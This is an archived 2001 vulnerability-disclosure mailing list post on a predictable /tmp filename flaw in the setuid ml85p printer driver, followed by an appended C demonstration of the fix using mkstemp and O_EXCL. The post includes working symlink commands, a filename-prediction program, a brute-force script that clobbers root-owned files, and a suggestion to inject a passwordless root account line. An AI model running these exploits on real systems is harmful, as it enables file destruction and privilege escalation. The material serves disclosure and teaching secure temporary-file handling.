Vulnerability Development mailing list archives

ml85p - driver for Samsung ML-85G and /tmp


From: KF <dotslash () snosoft com>
Date: Tue, 10 Jul 2001 00:07:20 -0400

ml85p - driver for Samsung ML-85G GDI printers seems to use /tmp insecurely.
It seems to use the time() function to determine the /tmp file's name. 

[root@linux exp]# strings /usr/bin/ml85p | grep tmp
/tmp/ml85g%d

[401070dd] iopl(0x3)                    = 0
[400cf2bd] time(NULL)                   = 994462668
[40100cbf] brk(0)                       = 0x8064544
[40100cbf] brk(0x80646c4)               = 0x80646c4
[40100cbf] brk(0x8065000)               = 0x8065000
[400fa484] open("/tmp/ml85g994462668", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3

TIME(2)             Linux Programmer's Manual             TIME(2)

NAME
       time - get time in seconds

SYNOPSIS
       #include <time.h>

       time_t time(time_t *t);

DESCRIPTION
       time  returns  the  time since the Epoch (00:00:00 UTC, January 1, 1970),
       measured in seconds.

[d0tslash@linux d0tslash]$ ln -s /etc/test /tmp/ml85g994462666
[d0tslash@linux d0tslash]$ ln -s /etc/test /tmp/ml85g994462667
[d0tslash@linux d0tslash]$ ln -s /etc/test /tmp/ml85g994462668

This is trivial... root must run the following command. 
[root@linux exp]# /usr/bin/ml85p -s 

-s simulate the printing  process,  but  write  the  compressed  output  to  a
       /tmp/ml85xxxxxxxx  file,  where  the  filename  suffix  is the current time in
       time_t units (seconds since 12/31/1970).

As you can see, this is the one that hits us... 
[400fa484] open("/tmp/ml85g994462668", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3

Oh, how nice, a truncation flag... 

O_TRUNC
       If  the  file  already  exists  and is a regular file and the open mode
       allows writing (i.e., is O_RDWR or O_WRONLY) it will  be  truncated  to
       length  0.  

[root@linux exp]# ls -al /tmp | grep ml  
-rw-r--r--    1 root     root            0 Jul  6 19:37 ml85g994462665
lrwxrwxrwx    1 d0tslash d0tslash        9 Jul  6 19:37 ml85g994462666 -> /etc/test
lrwxrwxrwx    1 d0tslash d0tslash        9 Jul  6 19:37 ml85g994462667 -> /etc/test
lrwxrwxrwx    1 d0tslash d0tslash        9 Jul  6 19:37 ml85g994462668 -> /etc/test
-rw-r--r--    1 root     root            0 Jul  6 19:37 ml85g994462669
-rw-r--r--    1 root     root            0 Jul  6 19:37 ml85g994462670

[d0tslash@linux d0tslash]$ ls -al /etc/test
-rw-r--r--    1 root     root            0 Jul  6 19:37 /etc/test

I am not sure what other OSes pick for permissions by default... 
Mandrake seems to not allow user access by default... I don't know 
what group you need to have access to use this feature.

[d0tslash@linux d0tslash]$ /usr/bin/ml85p
bash: /usr/bin/ml85p: Permission denied

[d0tslash@linux d0tslash]$ ls -al /usr/bin/ml85p
-rwsr-x---    1 root     sys         11676 Mar 30 11:43 /usr/bin/ml85p*

For shits and giggles, let's see what happens if it's got bad perms. 
[root@linux exp]# chmod 4755 /usr/bin/ml85p   

In which case the results are as follows: 

[d0tslash@linux d0tslash]$ /usr/bin/ml85p -s (several times)
-rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463605
-rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463607
-rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463608
-rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463609

[d0tslash@linux d0tslash]$ cat ml85p-exp.c   
// ln -s /etc/oops /tmp/ml85g`./ml85p-exp`
 
#include <time.h>
#include <stdio.h>

/* Prints the time_t value the driver will use for its /tmp file name
 * 30 seconds from now, i.e. the suffix a link has to be placed at. */
int main(int argc, char **argv)
{
    time_t x = time(NULL);
    x = x + 30;
    printf("%ld\n", (long)x);
    return 0;
}

[d0tslash@linux d0tslash]$ cat ml85p.sh
#!/bin/bash
# krfinisterre () checkfree com
# brute.sh <low> <hi>: loops <hi>-<low> times, each time creating a link
# at the name ml85p-exp predicts (current time + 30 s).
if [ $# -ne 2 ]; then
        echo "brute.sh <low> <hi>"
        exit 1
fi
L=$1
H=$2
while [ "$L" -lt "$H" ]
do
        ln -s /etc/oops /tmp/ml85g`./ml85p-exp`
        let L=L+1
done

The following file is created. 
-rw-r--r--    1 root     d0tslash        0 Jul  6 20:18 /etc/oops

Not sure what use this is short of clobbering files... Since the output is sent to this file, it may be possible to 
print `owned::0:0:root:/root:/bin/bash` to this driver and it may append it to the file in /tmp... I am not sure though... 
just an idea.
-KF
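An added illustration (not part of KF's post or the ml85p driver) of the two open() patterns at issue: the driver's time()-named, O_TRUNC, no-O_EXCL open beside the hardened mkstemp()/O_EXCL form. run_scenario() builds the situation in a fresh private directory under /tmp (the directory name, the "victim" file and the link are constructed for the demo) and reports which calls followed the pre-placed link and which refused it.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <time.h>
#include <unistd.h>

/* Pattern from the post: name derived from time(), O_TRUNC, no O_EXCL. */
int open_predictable(const char *dir, time_t t) {
    char path[PATH_MAX];
    snprintf(path, sizeof path, "%s/ml85g%ld", dir, (long)t);
    return open(path, O_RDWR | O_CREAT | O_TRUNC, 0666);
}

/* Hardened form: mkstemp() picks an unpredictable suffix and opens with
 * O_CREAT|O_EXCL and mode 0600, so a pre-placed file or symlink at the
 * chosen name makes the call fail with EEXIST instead of being followed. */
int open_private(const char *dir, char *out, size_t outlen) {
    snprintf(out, outlen, "%s/ml85gXXXXXX", dir);
    return mkstemp(out);
}

/* Constructed scenario in a private mkdtemp() directory (0700, not sticky,
 * so the kernel's protected_symlinks setting does not mask the result).
 * Returns a bitmask, or -1 on setup failure:
 *   1: open_predictable() followed the link and truncated the victim file
 *   2: O_CREAT|O_EXCL on the same link path was refused with EEXIST
 *   4: open_private() created a separate 0600 file */
int run_scenario(void) {
    char dir[] = "/tmp/ml85demoXXXXXX", victim[PATH_MAX], link[PATH_MAX], priv[PATH_MAX];
    if (!mkdtemp(dir)) return -1;
    time_t t = time(NULL);
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/ml85g%ld", dir, (long)t);
    int vfd = open(victim, O_WRONLY | O_CREAT, 0600);
    if (vfd < 0 || write(vfd, "data", 4) != 4 || symlink(victim, link) != 0) return -1;
    close(vfd);
    int result = 0;
    struct stat a, b;
    int fd = open_predictable(dir, t);
    if (fd >= 0 && fstat(fd, &a) == 0 && stat(victim, &b) == 0
        && a.st_ino == b.st_ino && b.st_size == 0) result |= 1;
    if (fd >= 0) close(fd);
    int xfd = open(link, O_RDWR | O_CREAT | O_EXCL, 0600);
    if (xfd < 0 && errno == EEXIST) result |= 2; else if (xfd >= 0) close(xfd);
    int pfd = open_private(dir, priv, sizeof priv);
    if (pfd >= 0 && fstat(pfd, &a) == 0 && (a.st_mode & 0777) == 0600
        && a.st_ino != b.st_ino) { result |= 4; close(pfd); unlink(priv); }
    unlink(link); unlink(victim); rmdir(dir);
    return result;
}
```

On a real /tmp (sticky, world-writable) a modern Linux with fs.protected_symlinks=1 also refuses to follow a link owned by a different user than the caller, which is a system-level mitigation for exactly the pattern the post describes.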
